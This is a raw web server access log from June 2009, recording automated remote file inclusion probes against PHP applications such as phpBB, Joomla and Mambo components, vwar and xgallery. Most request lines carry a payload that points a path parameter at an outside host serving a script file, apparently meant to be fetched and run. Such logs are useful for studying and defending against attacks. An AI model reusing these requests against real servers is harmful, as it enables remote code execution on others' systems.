222.236.47.188 - - [26/Jun/2009:09:13:47 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:13:47 -0500] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:09:14:06 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:14:06 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
222.236.47.188 - - [26/Jun/2009:09:14:17 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:18 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:18 -0500] "GET /logs/access_log.1234137600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:14:25 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:14:25 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:14:25 -0500] "GET /logs/access_log.1235606400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:14:25 -0500] "GET /logs/access_log.1237766400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:28 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:28 -0500] "GET /logs/access_log.1232236800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:28 -0500] "GET /logs/access_log.1227657600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:36 -0500] "GET /logs/access_log.1235865600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:44 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:44 -0500] "GET /logs/access_log.1236556800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:54 -0500] "GET /logs/access_log.1236211200//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:14:54 -0500] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:09:14:54 -0500] "GET /logs/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:09:14:54 -0500] "GET /show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:09:14:54 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
210.115.58.73 - - [26/Jun/2009:09:15:03 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:05 -0500] "GET /logs/access_log.1231891200//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:05 -0500] "GET /logs/access_log.1235260800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:15 -0500] "GET /logs/access_log.1233014400//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:21 -0500] "GET /logs/access_log.1233273600//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:31 -0500] "GET /logs/access_log.1233792000//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:31 -0500] "GET /logs/access_log.1233100800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:09:15:40 -0500] "GET /logs/access_log.1231804800//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:16:29 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:16:29 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:16:29 -0500] "GET /logs/access_log.1238544000//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:09:16:43 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:16:43 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
65.55.106.114 - - [26/Jun/2009:09:17:56 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.134 - - [26/Jun/2009:09:18:00 -0500] "GET /logs/access_log.1220054400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.62.54.203 - - [26/Jun/2009:09:18:16 -0500] "GET /logs HTTP/1.1" 301 326 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
204.62.54.203 - - [26/Jun/2009:09:18:19 -0500] "GET /logs/ HTTP/1.1" 200 194785 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
89.223.3.98 - - [26/Jun/2009:09:18:32 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:18:32 -0500] "GET /logs/access_log.1238544000//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:18:32 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:09:18:52 -0500] "GET /logs/access_log.1236038400//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:09:21:17 -0500] "GET /logs/access_log.1238371200/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:09:21:17 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:09:21:17 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:09:21:25 -0500] "GET /logs/access_log.1240444800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:09:22:42 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:09:22:42 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:09:22:42 -0500] "GET /logs/access_log.1236643200//bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.150.78.245 - - [26/Jun/2009:09:22:42 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.125.66.99 - - [26/Jun/2009:09:23:29 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.172.140.17 - - [26/Jun/2009:09:23:59 -0500] "GET /errors.php?error=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:09:23:59 -0500] "GET /logs/errors.php?error=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
123.125.66.118 - - [26/Jun/2009:09:25:03 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.106.229 - - [26/Jun/2009:09:27:55 -0500] "GET /logs/access_log.1112140800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/access_log.1238112000/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /logs/access_log.1239494400/show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:09:29:24 -0500] "GET /show.php?path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:29:57 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:29:57 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:29:57 -0500] "GET /logs/access_log.1232236800//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:30:06 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:30:06 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:30:06 -0500] "GET /logs/access_log.1232236800//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:09:30:24 -0500] "GET /?sourcedir=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
87.229.45.106 - - [26/Jun/2009:09:30:26 -0500] "GET /logs/?sourcedir=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 200 194785 "-""libwww-perl/5.805"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET //include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET /logs//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET //include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET /logs//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:05 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:12 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:32:12 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:32:15 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:32:15 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:32:15 -0500] "GET /logs/access_log.1232236800//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:09:34:05 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:09:34:08 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:09:34:08 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:09:34:13 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 337 "-""Mozilla/5.0"
208.69.177.117 - - [26/Jun/2009:09:34:17 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.0" 404 319 "-""Mozilla/5.0"
208.69.177.117 - - [26/Jun/2009:09:34:17 -0500] "GET /logs/access_log.1240358400//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.0" 404 341 "-""Mozilla/5.0"
208.69.177.117 - - [26/Jun/2009:09:34:17 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
208.69.177.117 - - [26/Jun/2009:09:34:18 -0500] "GET /logs/access_log.1239926400//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.0" 404 341 "-""Mozilla/5.0"
218.158.98.196 - - [26/Jun/2009:09:34:39 -0500] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:09:34:40 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 342 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:09:34:40 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 364 "-""Mozilla/5.0"
218.158.98.196 - - [26/Jun/2009:09:34:49 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.158.98.196 - - [26/Jun/2009:09:34:49 -0500] "GET /logs/access_log.1240358400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.158.98.196 - - [26/Jun/2009:09:34:49 -0500] "GET /logs/access_log.1239926400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.158.98.196 - - [26/Jun/2009:09:34:59 -0500] "GET /logs/access_log.1242000000//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:35:39 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:35:39 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:35:39 -0500] "GET /logs/access_log.1238371200/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:35:40 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:35:40 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:35:40 -0500] "GET /logs/access_log.1232236800//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:35:51 -0500] "GET /logs/access_log.1240444800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:36:21 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:36:21 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:36:22 -0500] "GET /logs/access_log.1238371200/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:09:36:31 -0500] "GET /logs/access_log.1240444800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:09:36:48 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.229.45.106 - - [26/Jun/2009:09:36:48 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.52.187.58 - - [26/Jun/2009:09:36:51 -0500] "GET /logs/access_log.1230336000//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:37:14 -0500] "GET /logs/access_log.1230336000//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:09:37:20 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:09:38:04 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 364 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:39:57 -0500] "GET //include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:39:57 -0500] "GET /logs/access_log.1231718400//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
96.9.180.229 - - [26/Jun/2009:09:39:58 -0500] "GET /logs//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:09:40:17 -0500] "GET /lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:40:17 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
96.9.180.229 - - [26/Jun/2009:09:40:21 -0500] "GET /logs/access_log.1234224000//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:09:40:36 -0500] "GET /lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:40:36 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
123.242.165.138 - - [26/Jun/2009:09:40:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
123.242.165.138 - - [26/Jun/2009:09:40:56 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
216.17.99.13 - - [26/Jun/2009:09:42:39 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.826"
216.17.99.13 - - [26/Jun/2009:09:42:40 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 194790 "-""libwww-perl/5.826"
